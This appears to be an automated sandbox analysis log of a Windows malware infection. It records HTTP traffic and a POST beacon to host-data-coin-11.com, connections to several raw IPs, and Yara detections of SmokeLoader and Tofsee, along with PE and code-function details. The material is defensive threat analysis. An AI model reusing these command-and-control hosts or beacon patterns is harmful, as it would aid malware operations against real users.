                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4f 0a ad 24 c4 d0 66 b1 78 06 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OTevO$fxP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 72 9e 57 c4 e0 66 e1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevBrWfdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 06 8e 51 de c4 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevBQf#YJ0
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown | HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sasldotps.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: host-data-coin-11.com
                      Source: unknown | HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49787 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49810 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49876 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49878 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49893 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49914 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49923 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49928 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49932 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49936 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected SmokeLoader
                      Source: Yara match | File source: 23.2.6B9B.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.0.6B9B.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.0.6B9B.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.1.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.1.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.ttfssdi.6015a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.GNXG5XLBEH.exe.6d15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.1.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.0.6B9B.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.375811349.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.354285300.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.303363186.0000000000470000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.354370443.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000000.288599943.00000000030E1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.303673269.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: GNXG5XLBEH.exe, 00000000.00000002.243273851.000000000072A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      Yara detected Tofsee
                      Source: Yara match | File source: 45.2.svchost.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.3.77CC.exe.2190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 45.2.svchost.exe.2ee0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.3.evjgtzc.exe.620000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.77CC.exe.2170e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.660000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.660000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.77CC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.77CC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.600e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 43.2.evjgtzc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002B.00000002.402320315.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.395583768.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000002.552204136.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000003.371626952.0000000002190000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002B.00000002.402219986.0000000000600000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 77CC.exe PID: 5196, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: evjgtzc.exe PID: 4876, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4020, type: MEMORYSTR

                      System Summary:

                      PE file has nameless sections
                      Source: 1523.exe.4.dr | Static PE information: section name:
                      Source: 1523.exe.4.dr | Static PE information: section name:
                      Source: 1523.exe.4.dr | Static PE information: section name:
                      Source: 1523.exe.4.dr | Static PE information: section name:
                      Source: 1523.exe.4.dr | Static PE information: section name:
                      Source: 1523.exe.4.dr | Static PE information: section name:
                      Source: 54D0.exe.4.dr | Static PE information: section name:
                      Source: 54D0.exe.4.dr | Static PE information: section name:
                      Source: 54D0.exe.4.dr | Static PE information: section name:
                      Source: 54D0.exe.4.dr | Static PE information: section name:
                      Source: 54D0.exe.4.dr | Static PE information: section name:
                      Source: 54D0.exe.4.dr | Static PE information: section name:
                      Source: 6471.exe.4.dr | Static PE information: section name:
                      Source: 6471.exe.4.dr | Static PE information: section name:
                      Source: 6471.exe.4.dr | Static PE information: section name:
                      Source: 6471.exe.4.dr | Static PE information: section name:
                      Source: 6471.exe.4.dr | Static PE information: section name:
                      Source: 6471.exe.4.dr | Static PE information: section name:
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 0_2_004250C0
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 0_2_0042B530
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 0_2_0042A750
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_2_00402AB3
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_00402A5F
                      Source: C:\Users\user\AppData\Roaming\ttfssdi | Code function: 19_1_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exe | Code function: 21_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 23_2_0042A8F0
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 23_2_00425260
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 23_2_0042B6D0
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 23_2_006431FF
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 23_2_00643253
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: 26_1_00402B2E
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe | Code function: 28_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe | Code function: 28_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe | Code function: 28_2_0041A14B
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe | Code function: 28_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe | Code function: 28_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_0042B310
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_0042A530
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_00424EA0
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: 30_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: GNXG5XLBEH.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: GNXG5XLBEH.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: GNXG5XLBEH.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: GNXG5XLBEH.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2205.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2205.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2205.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2D8F.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D9EC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D9EC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D9EC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 5BBC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 5BBC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 5BBC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6B9B.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6B9B.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6B9B.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6B9B.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6BA5.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6BA5.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6BA5.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6BA5.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 77CC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 77CC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 77CC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 77CC.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ttfssdi.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ttfssdi.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ttfssdi.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ttfssdi.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: evjgtzc.exe.30.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: evjgtzc.exe.30.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: evjgtzc.exe.30.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: evjgtzc.exe.30.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\8058.exe | Section loaded: mscorjit.dll
                      Source: GNXG5XLBEH.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\6E36.exe, type: DROPPED | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe | Code function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: String function: 00422FD0 appears 133 times
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe | Code function: String function: 0041E750 appears 172 times
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: String function: 0041E370 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: String function: 02172794 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exe | Code function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: String function: 0041E5B0 appears 172 times
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: String function: 00422E30 appears 133 times
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe | Code function: 1_2_0040196D Sleep,NtTerminateProcess,
